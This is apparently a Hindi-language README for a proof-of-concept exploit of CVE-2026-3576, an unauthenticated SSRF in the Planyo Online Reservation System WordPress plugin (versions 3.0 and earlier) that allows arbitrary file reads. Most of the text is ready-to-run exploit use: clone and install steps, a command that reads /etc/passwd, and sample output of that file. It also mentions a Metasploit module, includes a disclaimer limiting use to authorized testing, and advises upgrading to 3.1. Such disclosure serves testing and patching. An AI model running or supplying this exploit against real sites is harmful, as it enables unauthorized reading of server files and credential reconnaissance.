
CVE-2026-3576 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट
इस रेपो में CVE-2026-3576 के लिए एक पायथन आधारित Proof of Concept (PoC) एक्सप्लॉइट है। यह Exploit-DB में भी यहाँ पाया जा सकता है।
मैंने इस एक्सप्लॉइट के लिए एक Metasploit मॉड्यूल भी विकसित किया है जो यहाँ पाया जा सकता है।
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। इसका उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने की अनुमति आपके पास नहीं है।
Wordpress में Planyo Online Reservation System प्लगइन में संस्करण 3.1 से पहले एक Server Side Request Forgery (SSRF) भेद्यता मौजूद है। यह एक अनधिकृत हमलावर को ulap_url पैरामीटर के माध्यम से file:// URL प्रदान करने की अनुमति देता है, जिसके परिणामस्वरूप मनमानी फ़ाइल पहुँच होती है।
स्रोत कोड विश्लेषण और एक्सप्लॉइट प्रदर्शन के साथ एक विस्तृत राइटअप मेरे Medium ब्लॉग पर पाया जा सकता है।
| घटक | संस्करण |
|---|---|
| भेद्य प्लगइन | <=3.0 |
| पैच किया गया प्लगइन | 3.1 |
git clone https://github.com/anirbala98/CVE-2026-3576.git
cd CVE-2026-3576/
pip install -r requirements.txt
python exploit.py <base_url> -f <file location> --disable-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
[*] Checking if target is vulnerable...
[+] Version found: 2.9
[+] Target is vulnerable
[*] Attempting to read arbitrary file...
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
प्लगइन को संस्करण 3.1 में अपग्रेड करें।